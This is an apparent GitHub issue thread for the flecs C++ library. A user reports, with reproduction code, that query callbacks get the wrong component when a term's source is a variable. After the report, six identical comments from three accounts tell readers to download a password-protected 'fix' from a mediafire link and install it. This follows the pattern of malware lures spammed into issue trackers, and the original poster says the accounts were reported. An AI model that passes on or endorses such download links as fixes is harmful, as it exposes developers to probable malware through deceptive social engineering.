### ISSUE TITLE
Source is not properly taken into account when iterating with the C++ API

### ISSUE THREAD

**Issue by Gaspard--** [SanderMertens/flecs#1324]
**Describe the bug**
When iterating over components with a different source using the C++ API, the new source does not seem to be properly taken into account.

**To Reproduce**
```cpp
flecs::world world;

struct Desc
{
  char const *name;
};

auto e0 = world.entity().set(Desc{"test_0"});
auto e1 = world.entity().set(Desc{"test_1"});

struct Relation
{};

for (int i = 0; i < 10; ++i)
  world.entity().add<Relation>(e0); // Note: we are only referencing e0, so "test_1" should never appear

world.query_builder<const Relation, const Desc>()
  .term_at(0).second("$Instance")
  .term_at(1).src("$Instance")
  .build()
  .each([](Relation const &, Desc const &desc)
  {
    std::cout << desc.name << std::endl;
  });
```

Possible Output:
```
test_0
test_1
<crash or garbage>
```

**Expected behavior**
I would expect "test_0" to be printed 10 times, since 10 entities match, and the component from the other source should be "test_0" for each match.

**Additional context**
It's possible that I'm not using the API properly, but from what I read in the doc and what the flecs explorer suggests as code, this seems to be intended usage.
From other tests I've made, the queries always seem to match the right entities, so it seems it's just the arguments to the callback which are somehow wrong.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Gaspard--** [comment]
I have reported the above accounts, I don't think I can do more sadly.
